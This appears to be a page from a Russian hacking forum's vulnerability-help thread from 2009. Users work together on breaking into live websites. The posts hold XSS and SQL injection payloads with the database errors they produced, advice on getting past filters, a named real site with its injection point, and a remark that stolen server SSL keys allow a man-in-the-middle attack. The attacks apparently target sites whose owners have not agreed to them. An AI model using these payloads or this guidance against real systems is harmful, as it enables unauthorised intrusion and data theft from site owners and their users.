HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 592 из 2438 « Первая < 92492542582 588 589 590 591 592 593 594 595 596 60264269210921592 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #5911  
Старый 12.03.2009, 00:35
Neoveneficus
Reservists Of Antichat - Level 6
Регистрация: 10.04.2008
Сообщений: 299
С нами: 9518726

Репутация: 405
По умолчанию
Цитата:
Сообщение от Велемир  
/usr/local/apache/etc/ssl.all
Мб кто подскажет,что надо делать,какие проги нужны ?
Хм... А что ты собрался делать?

Я так понимаю в этой папке лежат ключи, которые позволяют пользователям сайта/ов заходить на них, используя зашифрованное соединение ssl - это когда в адресной строке не http:// а https://. В этом случае трафик шифруется. Ключи выдаются специальными, уполномоченными на то, центрами сертификации.

Наличие сертификата сервера, если я не ошибаюсь, позволяет тебе провести атаку "человек по середине". Но не думаю, что если ты задаешь подобный вопрос, то тебе оно надо...
__________________
II venēficus, ī m.
(с лат.) волшебник, чародей
 
Ответить с цитированием

  #5912  
Старый 12.03.2009, 15:31
1west
Познающий
Регистрация: 08.02.2007
Сообщений: 30
С нами: 10134157

Репутация: 3
По умолчанию
Помогите разобраться!
Запрос такой
?cu=TT<script>alert('ok')</script>
вылитело окно -- ок

На странице появилось
Error in query
SELECT qnty_ FROM currency WHERE crncy='TT' ORDER BY date_ DESC LIMIT 1
1064: You have an error in your SQL syntax near 'ok')' ORDER BY date_ DESC LIMIT 1' at line 1

Вот мучаю скуль и никак пройти в перед не могу.
через order+by показывает 1 поле.

?cu=TT%27+union+select+111/*
You have an error in your SQL syntax near 'union select 111/*' ORDER BY date_ DESC LIMIT 1' at line 1

?cu=TT%27%2520union%2520select%2520null/*
Unknown column '20union' in 'where clause'

?cu=TT%27+and+(select+111)/*
You have an error in your SQL syntax near 'select 111)/*' ORDER BY date_ DESC LIMIT 1' at line 1
 
Ответить с цитированием

  #5913  
Старый 12.03.2009, 15:42
TreV@N
Участник форума
Регистрация: 14.07.2008
Сообщений: 117
С нами: 9382468

Репутация: 104
По умолчанию
Сервер фильтрует / попробуй 1' UNION SELECT 1 --

Или стучись помогу 486503551
 
Ответить с цитированием

  #5914  
Старый 12.03.2009, 16:14
1west
Познающий
Регистрация: 08.02.2007
Сообщений: 30
С нами: 10134157

Репутация: 3
По умолчанию
Цитата:
Сообщение от TreV@N  
Сервер фильтрует / попробуй 1' UNION SELECT 1 --

Или стучись помогу 486503551

здесь проблема в другом.
/* -- # без разници ошибка одна и таже.
как я понял тут только подзапросами можно.
но никак немогу и их использовать.
 
Ответить с цитированием

  #5915  
Старый 12.03.2009, 16:27
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию
2 1west урлу в студию , поможем
 
Ответить с цитированием

  #5916  
Старый 12.03.2009, 18:08
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами: 10227206

Репутация: 2163
По умолчанию
Цитата:
select qnty_ from currency where crncy='('ok')' order by date_ desc limit 1
=> You have an error in your SQL syntax near 'ok')' ORDER BY date_ DESC LIMIT 1' at line 1
Цитата:
select qnty_ from currency where crncy='1' order by 1/* order by date_ desc limit 1
=> "через order+by показывает 1 поле."
Цитата:
select qnty_ from currency where crncy='1' union select 1/* order by date_ desc limit 1
mysql 3* => You have an error in your SQL syntax near 'union select 111/*' ORDER BY date_ DESC LIMIT 1' at line 1
Цитата:
select qnty_ from currency where crncy='1' and (select 111)/* order by date_ desc limit 1
mysql 3* => You have an error in your SQL syntax near 'select 111)/*' ORDER BY date_ DESC LIMIT 1' at line 1

хекерская догадка 45% (с)
 
Ответить с цитированием

  #5917  
Старый 12.03.2009, 19:37
IDW
Новичок
Регистрация: 08.09.2008
Сообщений: 21
С нами: 9300787

Репутация: 7
По умолчанию
Код:
http://www.prazdnik.by/calendar/?day=-1%27
Вот, инъекция есть, но немогу расковырять, чтобы не запрашивал не работает

Код:
 [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Март')))) ORDER BY BE.SORT asc' at line 1]
 
Ответить с цитированием

  #5918  
Старый 12.03.2009, 19:40
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
С нами: 10077446

Репутация: 1020


По умолчанию
Кавычки слешируються
'-1\\''))
фигасе запрос, походу автоматом(аля ORM-генерация) формируеться.
Последний раз редактировалось AkyHa_MaTaTa; 12.03.2009 в 19:53..
 
Ответить с цитированием

  #5919  
Старый 12.03.2009, 19:44
IDW
Новичок
Регистрация: 08.09.2008
Сообщений: 21
С нами: 9300787

Репутация: 7
По умолчанию
т.е. нельзя инъекцию провести?
 
Ответить с цитированием

  #5920  
Старый 12.03.2009, 19:50
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами: 9288132

Репутация: 571
По умолчанию
Можно, просто внимательно читай, что про синтаксис пишется.
Последний раз редактировалось R1dex; 12.03.2009 в 19:54..
 
Ответить с цитированием
Ответ
Страница 592 из 2438 « Первая < 92492542582 588 589 590 591 592 593 594 595 596 60264269210921592 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.